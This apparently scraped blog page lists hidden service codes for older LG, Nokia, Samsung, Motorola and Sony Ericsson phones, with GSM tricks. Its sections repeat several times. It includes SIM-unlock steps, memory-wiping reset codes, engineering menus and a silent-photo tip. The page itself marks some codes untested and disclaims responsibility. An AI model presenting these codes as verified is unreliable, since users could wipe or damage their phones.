Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#
FOR NOKIA
To check the phones Software revision for Nokia Mobile.
On the main screen type *#0000#
To enter in the secret menu in Nokia Phone.
On the main screen type *#92702689# [*#war0anty#]
It will take you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair – if found (0000)
5. Shows life timer of phone (time passes since last start)
To restore Factory Settings for Nokia mobile
*#7780# reset to factory settings.
Taking picture without getting noticed.
Turn on/off the “click” sound made by the camera by selecting the ‘Silent’ profile or by turning warning tones on/off.
Hiding your Mobile/ Cellphone Number
Go to: Menu > Tools > Settings > Call > Send My Caller ID >
‘Yes’, ‘No’ or ‘Set By Network’ to follow the default settings of your home network.
It works only with very few network who provide you facility of “Private Number”
Speed Dialing From Simcard contact (not stored in mobile phonebook)
Type number followed by # then call.
Example: 1# or 2# or 21#
==================================================
FOR SAMSUNG
If you have downloaded corrupted or incompatible Java midlets or other media,
which are causing problems with the phone, try this
*2767*JAVA# Java Reset and (Deletes all Java Midlets)
*2767*MEDIA# Reset Media (Deletes All Sounds and Pics)
*2767*WAP# Wap Reset
*2767*CUST# Reset Custom EEPR0M
*2767*FULL# Reset Full EEPR0M (Caution)
For example : *2767*JAVA# would be keyed in as *2767*5282#
Note : Not all codes will work with SGH-C100.
The master reset code is: #*7728#
This will not delete anything from your
mobile phone, but set each and eveything to its
default/standard setting as it was on the time of purchase.
To unlock your phone put a sim from another company,
now type *#9998*3323# it will reset your phone. Push exit and then push 7,
it will reset again. Put your other sim in and it will say sim lock,
type in 00000000 then it should be unlocked. Type in *0141# then
the green call batton and it’s unlocked to all networks.
This code may not work on the older phones and some of the newer phones.
If it doesn’t work you will have to reset your phone without a sim in it
by typing *#2767*2878# or *#9998*3855# (not tested)
Other Samsung Codes *#9998*4357# Help Menu *#9998*5282# Java menu (GRPS/CSD settings for JAVA server) *#9999#0# Monitor Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm *#9998*585# Non-Volatile Memory (NVM) *#3243948# Digital Audio Interference Off *#32436837# Digital Audio Interference On
==================================================
FOR MOTOROLA
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line – (use this to write things below the provider name):
[] [] [] 0 0 8 [] 1 []
Add phonebook to main menu:
[] [] [] 1 0 5 [] 1 []
Add messages to main menu:
[] [] [] 1 0 7 [] 1 []
Copy SIM memory (phonebook menu):
[] [] [] 1 0 8 [] 1 []
Eng Field options (main menu):
[] [] [] 1 1 3 [] 1 []
Slow (Frequency of search menu):
[] [] [] 1 0 1 [] 1 []
Medium (Frequency of search menu):
[] [] [] 1 0 2 [] 1 []
Fast (Frequency of search menu):
[] [] [] 1 0 3 [] 1 []
Enable EFR:
[] [] [] 1 1 9 [] 1 []
Function :
[] [] [] # # # [] 1 []
Change pin:
[] [] [] 0 0 4 [] 1 []
Unblocking using the “puk” number:
[] [] [] 0 0 5 [] 1 []
You can change GSM frequencies to 900/1800 by entering the enginnering model.
Following the below steps:
enter menu and press 048263* quickly,
then you will enter the secret engineering menu under “Opcode”
input 10*0*3 for GSM 900
10*0*4 for GSM 1800
10*0*5 for GSM 1900
10*0*6 for dual band GSM 900/1800
10*0*7 for dual band GSM 850/1900
To add extra message space 4 your Motorola C350 C450 C550 or C650,
press menu button, press 048263* quickly, then on the popup menu enter 47 press ok.
press 50 and ok.press 1 ok.press 64 ok.press 1 ok.press 186 and ok.
You will receive an extra 50 msgs memory space.Switch phone off and back on.
==================================================
Sony Ericsson
Sony Ericsson Secret Menu:
> * < < * means press joystick or arrow keys to right
< means press joystick or arrow keys to left
1. push joy stick to RIGHT once
2. press *
3. push joy stick to LEFT twice
4. press *
5. push joy stick to LEFT once
6. press *
The Service Menu will appears containing following information !
1. Service Info
a. Software Version
b. SIMlock
c. Configuration
2. Service Setting
a. Contrast
3. Service Test
a. Display
b. LED/Illumination – *This test is very cool
c. Keyboard
d. Buzzer
e. Vibrator
f. Earphone
g. Microphone
h. Real Time Clock
i. Joystick Counter*
Lockstatus: < * * <
Shortcut to last dialed numbers: 0#
Shortcut to sim numbers: On main menu type a number and press #
If you change the language from default to any other language, then it may be difficult to switch to default language.
The shortcut is very simple. Just press
stands for right arrow button or joystick.
Secret Games: Snake on the T68
Go to Erix and then on the main screen press 123 and you will be taken to the game.
Secret Message:
On Tetris on the main screen when the blocks are falling press 397 and a message will appear.
======================================
GSM Secret
All the tips and tricks provided by Hidden Tricks is free and its not necessary to sign up also.
Type *#61# and press call – Check call redirection status.
Cancel all redirections: ##002#
*43# to activate call waiting, to deactivate #43#.
If your phone doesn’t have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.
On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at once
If you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx#
If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call. (*#30# / *#31# or *31# / #31# ) Works on some networks.
Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.
When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*
Important:
If you know any other tips & tricks & secrets about GSM mobile or any other mobile which is not listed here then you can post in Memberbook and it will be updated soon with your name.
Warning:
You can try these codes at your own responsibility ! We are not responsible for any malfunction and we don’t accept any complaints.
To check IMEI (International Mobile Equipment Identity) for any mobile or cellular phone.
On the main screen type *#06#
Information you get from the IMEI (International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type approval code of your Nokia Mobile
FAC = Final assembly code of your cell phone
SNR = Serial number of your Nokia Phone
SP = Spare
FOR LG
LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*
LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#
FOR NOKIA
To check the phones Software revision for Nokia Mobile.
On the main screen type *#0000#
To enter in the secret menu in Nokia Phone.
On the main screen type *#92702689# [*#war0anty#]
It will take you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair – if found (0000)
5. Shows life timer of phone (time passes since last start)
To restore Factory Settings for Nokia mobile
*#7780# reset to factory settings.
Taking picture without getting noticed.
Turn on/off the “click” sound made by the camera by selecting the ‘Silent’ profile or by turning warning tones on/off.
Hiding your Mobile/ Cellphone Number
Go to: Menu > Tools > Settings > Call > Send My Caller ID >
‘Yes’, ‘No’ or ‘Set By Network’ to follow the default settings of your home network.
It works only with very few network who provide you facility of “Private Number”
Speed Dialing From Simcard contact (not stored in mobile phonebook)
Type number followed by # then call.
Example: 1# or 2# or 21#
==================================================
FOR SAMSUNG
If you have downloaded corrupted or incompatible Java midlets or other media,
which are causing problems with the phone, try this
*2767*JAVA# Java Reset and (Deletes all Java Midlets)
*2767*MEDIA# Reset Media (Deletes All Sounds and Pics)
*2767*WAP# Wap Reset
*2767*CUST# Reset Custom EEPR0M
*2767*FULL# Reset Full EEPR0M (Caution)
For example : *2767*JAVA# would be keyed in as *2767*5282#
Note : Not all codes will work with SGH-C100.
The master reset code is: #*7728#
This will not delete anything from your
mobile phone, but set each and eveything to its
default/standard setting as it was on the time of purchase.
To unlock your phone put a sim from another company,
now type *#9998*3323# it will reset your phone. Push exit and then push 7,
it will reset again. Put your other sim in and it will say sim lock,
type in 00000000 then it should be unlocked. Type in *0141# then
the green call batton and it’s unlocked to all networks.
This code may not work on the older phones and some of the newer phones.
If it doesn’t work you will have to reset your phone without a sim in it
by typing *#2767*2878# or *#9998*3855# (not tested)
Other Samsung Codes *#9998*4357# Help Menu *#9998*5282# Java menu (GRPS/CSD settings for JAVA server) *#9999#0# Monitor Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm *#9998*585# Non-Volatile Memory (NVM) *#3243948# Digital Audio Interference Off *#32436837# Digital Audio Interference On
==================================================
FOR MOTOROLA
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line – (use this to write things below the provider name):
[] [] [] 0 0 8 [] 1 []
Add phonebook to main menu:
[] [] [] 1 0 5 [] 1 []
Add messages to main menu:
[] [] [] 1 0 7 [] 1 []
Copy SIM memory (phonebook menu):
[] [] [] 1 0 8 [] 1 []
Eng Field options (main menu):
[] [] [] 1 1 3 [] 1 []
Slow (Frequency of search menu):
[] [] [] 1 0 1 [] 1 []
Medium (Frequency of search menu):
[] [] [] 1 0 2 [] 1 []
Fast (Frequency of search menu):
[] [] [] 1 0 3 [] 1 []
Enable EFR:
[] [] [] 1 1 9 [] 1 []
Function :
[] [] [] # # # [] 1 []
Change pin:
[] [] [] 0 0 4 [] 1 []
Unblocking using the “puk” number:
[] [] [] 0 0 5 [] 1 []
You can change GSM frequencies to 900/1800 by entering the enginnering model.
Following the below steps:
enter menu and press 048263* quickly,
then you will enter the secret engineering menu under “Opcode”
input 10*0*3 for GSM 900
10*0*4 for GSM 1800
10*0*5 for GSM 1900
10*0*6 for dual band GSM 900/1800
10*0*7 for dual band GSM 850/1900
To add extra message space 4 your Motorola C350 C450 C550 or C650,
press menu button, press 048263* quickly, then on the popup menu enter 47 press ok.
press 50 and ok.press 1 ok.press 64 ok.press 1 ok.press 186 and ok.
You will receive an extra 50 msgs memory space.Switch phone off and back on.
==================================================
Sony Ericsson
Sony Ericsson Secret Menu:
> * < < * means press joystick or arrow keys to right
< means press joystick or arrow keys to left
1. push joy stick to RIGHT once
2. press *
3. push joy stick to LEFT twice
4. press *
5. push joy stick to LEFT once
6. press *
The Service Menu will appears containing following information !
1. Service Info
a. Software Version
b. SIMlock
c. Configuration
2. Service Setting
a. Contrast
3. Service Test
a. Display
b. LED/Illumination – *This test is very cool
c. Keyboard
d. Buzzer
e. Vibrator
f. Earphone
g. Microphone
h. Real Time Clock
i. Joystick Counter*
Lockstatus: < * * <
Shortcut to last dialed numbers: 0#
Shortcut to sim numbers: On main menu type a number and press #
If you change the language from default to any other language, then it may be difficult to switch to default language.
The shortcut is very simple. Just press
stands for right arrow button or joystick.
Secret Games: Snake on the T68
Go to Erix and then on the main screen press 123 and you will be taken to the game.
Secret Message:
On Tetris on the main screen when the blocks are falling press 397 and a message will appear.
======================================
GSM Secret
All the tips and tricks provided by Hidden Tricks is free and its not necessary to sign up also.
Type *#61# and press call – Check call redirection status.
Cancel all redirections: ##002#
*43# to activate call waiting, to deactivate #43#.
If your phone doesn’t have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.
On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at once
If you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx#
If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call. (*#30# / *#31# or *31# / #31# ) Works on some networks.
Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.
When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*
Important:
If you know any other tips & tricks & secrets about GSM mobile or any other mobile which is not listed here then you can post in Memberbook and it will be updated soon with your name.
Warning:
You can try these codes at your own responsibility ! We are not responsible for any malfunction and we don’t accept any complaints.
0 comments:
Post a Comment